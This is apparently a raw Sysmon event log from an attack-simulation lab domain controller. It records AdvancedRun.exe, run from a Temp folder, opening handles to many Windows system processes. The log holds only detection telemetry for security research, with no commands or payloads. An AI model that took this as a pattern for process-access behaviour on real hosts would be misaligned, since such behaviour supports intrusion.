AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968394Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.750{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2800-000000002402}2836C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968393Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.744{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2600-000000002402}2820C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.743{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2500-000000002402}2748C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968391Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.741{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB9-61E7-2300-000000002402}2592C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968390Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.740{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB5-61E7-2200-000000002402}2520C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968389Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.739{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB5-61E7-2100-000000002402}2512C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968388Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.739{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB1-61E7-1F00-000000002402}2104C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968387Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.736{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1700-000000002402}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.736{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1600-000000002402}1292C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.736{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1500-000000002402}1240C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968384Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.736{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1400-000000002402}1084C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.736{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968382Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.736{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1200-000000002402}400C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968381Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.733{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1100-000000002402}416C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968379Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.730{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-0F00-000000002402}304C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968378Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.731{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1000-000000002402}436C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 734700x80000000000000002968377Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.528{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000002968376Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.729{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-0E00-000000002402}996C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968375Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
